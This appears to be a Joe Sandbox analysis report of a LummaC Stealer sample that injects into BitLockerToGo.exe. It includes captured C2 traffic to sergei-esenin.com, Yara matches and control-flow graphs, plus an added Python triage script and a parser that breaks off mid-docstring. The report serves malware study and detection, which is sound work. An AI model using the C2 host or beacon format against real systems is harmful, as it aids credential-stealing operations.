                                                                                                                 2024-10-13 10:00:36 UTC | 816 bytes | IN | Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                 2024-10-13 10:00:36 UTC | 1369 bytes | IN | Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f
                                                                                                                Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
                                                                                                                 2024-10-13 10:00:36 UTC | 1369 bytes | IN | Data Raw: 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70
                                                                                                                Data Ascii: ement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <inp
                                                                                                                 2024-10-13 10:00:36 UTC | 887 bytes | IN | Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61
                                                                                                                Data Ascii: <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="bra
                                                                                                                 2024-10-13 10:00:36 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 9 | 192.168.2.4 | 49746 | 172.67.206.204 | 443 | 4564 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                 2024-10-13 10:00:36 UTC | 354 bytes | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Cookie: __cf_mw_byp=vKrz3Hq72H1UNZmiSDnI_ARtZuyd8ck1abtebasc0mE-1728813636-0.0.1.1-/api
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 77
                                                                                                                Host: sergei-esenin.com
                                                                                                                 2024-10-13 10:00:36 UTC | 77 bytes | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--222&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                                 2024-10-13 10:00:37 UTC | 825 bytes | IN | HTTP/1.1 200 OK
                                                                                                                Date: Sun, 13 Oct 2024 10:00:37 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=3gppu7i2660mo2agck4pb8lmtt; expires=Thu, 06 Feb 2025 03:47:16 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3G9vi70KVd1wg5YPJrZAkk0e91uS1AVxeJRYypUY4qSk9cMQmhXcvLLJdaZuAVX1af1Jv7ujAeX1jhZCEyRg19veGqF7tbQaPkk2NNAB8G9kn4dIDo%2BCUkExMK8ZkdGRmbL%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8d1e7bceab7c8c77-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                 2024-10-13 10:00:37 UTC | 15 bytes | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                Data Ascii: aerror #D12
                                                                                                                 2024-10-13 10:00:37 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Target ID:0
                                                                                                                Start time:06:00:07
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                Imagebase:0x790000
                                                                                                                File size:19'250'176 bytes
                                                                                                                MD5 hash:F1113FD6005B558B0A9624EDD97DBD58
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003D6B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1919656324.0000000003DC2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:06:00:16
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                Imagebase:0x760000
                                                                                                                File size:231'736 bytes
                                                                                                                MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:06:00:36
                                                                                                                Start date:13/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1648
                                                                                                                Imagebase:0x630000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true
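Two of the records in this process list can be re-checked mechanically rather than by eye: the Yara-matched dump in BitLockerToGo.exe (Target ID 1) is PE-based and sits at 0x400000 with page protection 0x40 (PAGE_EXECUTE_READWRITE), while that process's own image base is 0x760000; and a binary under C:\Windows was started by an executable in a user profile. The Python below is an added triage example and is not part of the Joe Sandbox report. It assumes the .sdmp identifier layout (field 1 target id, field 4 base address, field 5 page protection; the remaining fields are left uninterpreted) and the parent link from Setup.exe to BitLockerToGo.exe, which the target ordering suggests but this section does not state; the WerFault.exe parent is left unset because "-p 4564" is not mapped to a target here.

```python
# Added example, not from the report: flag injected-image and odd-parent
# indicators in Joe Sandbox style process records and memory dump names.
import re
from dataclasses import dataclass, field
from typing import Optional

PAGE_EXECUTE_READWRITE = 0x40          # Win32 PAGE_* constant
USER_WRITABLE = re.compile(r"^C:\\Users\\", re.IGNORECASE)
SYSTEM_DIR = re.compile(r"^C:\\Windows\\", re.IGNORECASE)
# Assumed .sdmp layout: target.snapshot.timestamp.base.protect.<rest>
SDMP = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})\.",
    re.IGNORECASE,
)


@dataclass
class Dump:
    source: str        # Joe Sandbox memory dump identifier
    pe_based: bool     # "based on PE: true" in the dump header


@dataclass
class Proc:
    target_id: int
    path: str
    image_base: int
    parent_target: Optional[int]     # assumed from the report's target ordering
    dumps: list = field(default_factory=list)


def parse_dump_source(name: str) -> dict:
    """Split an .sdmp identifier into target id, base address and protection."""
    m = SDMP.match(name)
    if not m:
        raise ValueError(f"unrecognised dump name: {name}")
    return {"target": int(m.group(1), 16),
            "base": int(m.group(4), 16),
            "protect": int(m.group(5), 16)}


def rwx_outside_image(proc: Proc) -> list:
    """Bases of PE-based RWX dumps that are not at the process's declared image base."""
    hits = []
    for d in proc.dumps:
        info = parse_dump_source(d.source)
        if (d.pe_based and info["protect"] & PAGE_EXECUTE_READWRITE
                and info["base"] != proc.image_base):
            hits.append(info["base"])
    return hits


def user_writable_parent(procs: list) -> list:
    """(child, parent) pairs where a C:\\Windows binary was started from a user profile."""
    by_id = {p.target_id: p for p in procs}
    pairs = []
    for p in procs:
        parent = by_id.get(p.parent_target) if p.parent_target is not None else None
        if parent and SYSTEM_DIR.match(p.path) and USER_WRITABLE.match(parent.path):
            pairs.append((p.path, parent.path))
    return pairs


def triage(procs: list) -> list:
    """Human-readable findings for the two indicators above."""
    findings = []
    for p in procs:
        for base in rwx_outside_image(p):
            findings.append(f"target {p.target_id} {p.path}: PE-based RWX region at "
                            f"{base:#x}, declared image base {p.image_base:#x}")
    for child, parent in user_writable_parent(procs):
        findings.append(f"{child} started by user-profile binary {parent}")
    return findings


# Records transcribed from the report above (constructed test data; pe_based
# is only stated in the report for the BitLockerToGo dump).
PROCS = [
    Proc(0, r"C:\Users\user\Desktop\Setup.exe", 0x790000, None, [
        Dump("00000000.00000002.1919656324.0000000003CD6000.00000004.00001000.00020000.00000000.sdmp", False),
        Dump("00000000.00000002.1919656324.0000000003E18000.00000004.00001000.00020000.00000000.sdmp", False),
    ]),
    Proc(1, r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", 0x760000, 0, [
        Dump("00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp", True),
    ]),
    Proc(7, r"C:\Windows\SysWOW64\WerFault.exe", 0x630000, None),
]

if __name__ == "__main__":
    for line in triage(PROCS):
        print(line)
```

The RWX check deliberately requires all three conditions (PE-based, executable-writable, not at the declared image base): the Setup.exe heap dumps are PAGE_READWRITE data and must not trip it, whereas an image mapped at the 32-bit default link base 0x400000 inside a process whose real image loaded at 0x760000 is the hollowed-payload pattern this sample shows.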


                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:2.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:59.5%
                                                                                                                  Total number of Nodes:121
                                                                                                                  Total number of Limit Nodes:11
execution_graph: rendered interactively; the raw node/edge list is not reproduced. Library calls reached in the graph, in order of first appearance: VariantClear, SysFreeString, GetVolumeInformationW, LdrInitializeThunk, RtlFreeHeap, IsUserAnAdmin, ExitProcess, GetInputState, GetCurrentThreadId, GetCurrentProcessId, CoInitialize, CoInitializeSecurity, CoUninitialize, GetSystemDirectoryW, FreeLibrary, SysAllocString, RtlReAllocateHeap, GetForegroundWindow, CoCreateInstance, RtlAllocateHeap, VariantInit, SysStringLen, CoSetProxyBlanket.

Control-flow Graph: function 0x410ce0, basic blocks 0x410ce0 to 0x411235 (rendered interactively; the executed/not-executed block colouring is not reproduced). Library calls: CoInitialize, CoInitializeSecurity, GetSystemDirectoryW, CoUninitialize. Internal calls: 0x43c080, 0x403af0, 0x40c660, 0x43b800, 0x404430, 0x4044b0, 0x40c650, 0x43cc60, 0x43fad0, 0x40fa00.
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00410D41
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D63
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004110C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Initialize$DirectorySecuritySystem
                                                                                                                  • String ID: 2971BE6964AA73485AC05C7BE5FFBF3A$6)./$AR$FT]N$NP]V$UE$XR$ivuf$sergei-esenin.com$xA
                                                                                                                  • API String ID: 1379780170-3256075778
                                                                                                                  • Opcode ID: 2f276102ee0e3c0d505fc82d5b5d93b8a2e0c06ee12d51b879fde74540723e97
                                                                                                                  • Instruction ID: b314c5fb5ec9feb83f7ba8cf055eee09dd8c421c4eb33decb5d20b858ea80011
                                                                                                                  • Opcode Fuzzy Hash: 2f276102ee0e3c0d505fc82d5b5d93b8a2e0c06ee12d51b879fde74540723e97
                                                                                                                  • Instruction Fuzzy Hash: D6D136B5604B809FD3308F3998823A7BBE1FF46314F14492DD1D64B7A1D779A406CB9A

Control-flow Graph: function 0x43c27a, basic blocks 0x43c27a to 0x43cac3 (rendered interactively; the executed/not-executed block colouring is not reproduced). Library calls: SysAllocString (twice), SysFreeString, GetVolumeInformationW, VariantInit, VariantClear, SysStringLen. Internal calls: 0x444eb0, 0x40c650, 0x43fe30, 0x43fec0, 0x43fad0, 0x434d30, 0x43fa10, 0x43fcf0, 0x43fd10, 0x4425f0.
                                                                                                                  APIs
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0043C2BF
                                                                                                                  • SysAllocString.OLEAUT32(A7F2A1E7), ref: 0043C37A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2525500382-0
                                                                                                                  • Opcode ID: 12a8bdb9b6f6454cab4d1651166c86d1f0ee7a083b2212b7071bb308ce98ddeb
                                                                                                                  • Instruction ID: 774555d793f9318b6584dd5a37d188e5f0fb5422c9e0e8b9fdbc3024fa447b05
                                                                                                                  • Opcode Fuzzy Hash: 12a8bdb9b6f6454cab4d1651166c86d1f0ee7a083b2212b7071bb308ce98ddeb
                                                                                                                  • Instruction Fuzzy Hash: 4C220179604301CFD714CF28D891B66B7E2FF8A315F28996DD1868B7A1C739E906CB84

Control-flow Graph: function 0x43c0ac, basic blocks 0x43c0a0 to 0x43c1da (rendered interactively; the executed/not-executed block colouring is not reproduced). Library calls: CoCreateInstance.
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: Mano
                                                                                                                  • API String ID: 0-660390923
                                                                                                                  • Opcode ID: 687b30e87dbad23f1c3a8b185c35ffd4bb27c32e39341c552f8b8dd3abf9977f
                                                                                                                  • Instruction ID: 6d3762cac6a26fe1520f7b140e42db9dd76463b71a3d16f5c224e2857f2a922c
                                                                                                                  • Opcode Fuzzy Hash: 687b30e87dbad23f1c3a8b185c35ffd4bb27c32e39341c552f8b8dd3abf9977f
                                                                                                                  • Instruction Fuzzy Hash: D4318FB4511700EFD3109F29D946B02BFB4FF4A314F14C69EE4894F696C372940ACBAA

Control-flow Graph: function 0x40ff1d, basic blocks 0x40ff1d to 0x410049 (rendered interactively; the executed/not-executed block colouring is not reproduced). No library calls.
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: ()$B![#
                                                                                                                  • API String ID: 0-2254847027
                                                                                                                  • Opcode ID: 746004fa6715f82084249b9fe91d49c716601c16785aa253d9cbd9bfdae1f6b1
                                                                                                                  • Instruction ID: 7cd22eaa68942b92d33cc86fef7670e57c79a0b02bcec4961e68389e029e4acd
                                                                                                                  • Opcode Fuzzy Hash: 746004fa6715f82084249b9fe91d49c716601c16785aa253d9cbd9bfdae1f6b1
                                                                                                                  • Instruction Fuzzy Hash: 3321BDB4108381ABD714CF10D844A3BB7E4EF8A748F40592DF8869B291E734DA09CB5A

Control-flow Graph: function 0x40f340, basic blocks 0x40f340 to 0x40f9dd (rendered interactively; the executed/not-executed block colouring is not reproduced). No library calls. Internal calls: 0x40c5b0, 0x442540 (twice).
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: }y
                                                                                                                  • API String ID: 0-3327190302
                                                                                                                  • Opcode ID: 2d8923c749216e60cd30327a02fb41662980a1a337a75573fb6dd4541fb3159b
                                                                                                                  • Instruction ID: 43636b2d5f994ae026c4e79fecc38f0eb1c520d0b8271bc9293960db2d0ceb79
                                                                                                                  • Opcode Fuzzy Hash: 2d8923c749216e60cd30327a02fb41662980a1a337a75573fb6dd4541fb3159b
                                                                                                                  • Instruction Fuzzy Hash: D70213B5210B00CFD3248F25D895B97BBF5FB49314F148A2DE5AA8BAA0D774B409CF85

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 323 4425f0-442622 LdrInitializeThunk
                                                                                                                  APIs
                                                                                                                  • LdrInitializeThunk.NTDLL(00445B32,005C003F,00000002,00000018,?), ref: 0044261E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 0-2766056989
                                                                                                                  • Opcode ID: d6f0de40907b7b8b32ab63e6629629f2373b13dd03df179d009bb833d1b65a65
                                                                                                                  • Instruction ID: 43ab6ce6f9b4ffe8deda271e346de03ec0cad2768a2c3f7a78d21f3d95462d4e
                                                                                                                  • Opcode Fuzzy Hash: d6f0de40907b7b8b32ab63e6629629f2373b13dd03df179d009bb833d1b65a65
                                                                                                                  • Instruction Fuzzy Hash: C151F5756093408BE718CF19C89137BB7E2FFC9315F549A2DE48597390EB788905CB0A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4K
                                                                                                                  • API String ID: 0-3351438540
                                                                                                                  • Opcode ID: 02baefbf224e79af53af7ff0d3c1a7afc23cabfd664b4f537a753a58ffcbbc70
                                                                                                                  • Instruction ID: 45613f1c263a8273573b2830448e4c95824f8a86f650df032127b94f3687798c
                                                                                                                  • Opcode Fuzzy Hash: 02baefbf224e79af53af7ff0d3c1a7afc23cabfd664b4f537a753a58ffcbbc70
                                                                                                                  • Instruction Fuzzy Hash: 2E4115303443019BFB248E14CD92BBB73E5EBC2715F144A2DE591573DAD278AD069B1A

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 186 40cd80-40cd8e call 441280 189 40cd94-40cda1 IsUserAnAdmin call 439770 186->189 190 40cf6d-40cf6f ExitProcess 186->190 193 40cda7-40cdbe GetInputState 189->193 194 40cf68 call 442520 189->194 196 40cdc0-40cdd2 193->196 194->190 196->196 197 40cdd4-40cdfb GetCurrentThreadId GetCurrentProcessId 196->197 198 40ce00-40ce40 197->198 198->198 199 40ce42-40ce52 198->199 200 40ce60-40ce97 199->200 200->200 201 40ce99-40ce9b 200->201 202 40cefa-40cf15 201->202 203 40ce9d-40ceb6 201->203 205 40cf20-40cf53 202->205 204 40cec0-40cef8 203->204 204->202 204->204 205->205 206 40cf55-40cf5c call 40de50 205->206 206->194 209 40cf5e call 410ce0 206->209 211 40cf63 call 40f9f0 209->211 211->194
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000001.00000002.2029871925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentProcess$AdminExitInputStateThreadUser
                                                                                                                  • String ID: spqv
                                                                                                                  • API String ID: 2882748383-2206016640
                                                                                                                  • Opcode ID: 64cd9f2cdc271de3c135f5f2847121890b9a6db8ac0d1d5fe6f55c67cd9b9014
                                                                                                                  • Instruction ID: ad351b947d17469f2f642e33c4c6829e9e522de45026ab71fb1458425ec3535f
                                                                                                                  • Opcode Fuzzy Hash: 64cd9f2cdc271de3c135f5f2847121890b9a6db8ac0d1d5fe6f55c67cd9b9014
                                                                                                                  • Instruction Fuzzy Hash: 51414531A183008BD708AB79D99636BBAD2DFE6700F1989BDD4C6DB2D1D97C4802875A
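The `control_flow_graph` lines in these function blocks are flat edge lists: a decimal block id followed by its hex address range, then any Windows API names and `call` targets seen in that block, with `src->dst` edges interleaved. As an added example (not part of the Joe Sandbox report, its IDA plugin, or the sample) here is a small Python parser for that format with helpers that locate the entry and exit blocks, the self-looping blocks, and the order in which Windows APIs are met on a breadth-first walk from the entry. The token grammar is inferred from the lines on this page rather than from a published specification, and the embedded sample line is copied from the graph of the function at 0x40cd80 above, the block whose API ID reads `CurrentProcess$AdminExitInputStateThreadUser`.

```python
"""Parse the flat `control_flow_graph` lines emitted by Joe Sandbox's IDA plugin.
Token grammar, inferred from the lines in this report rather than a published spec:
  <id> <addr>[-<addr>]   start of a basic block: decimal id, hex address range
  <ApiName>              Windows API called from the current block
  call <addr>            internal call made from the current block
  <id>-><id>             control-flow edge; may name a block defined later
"""
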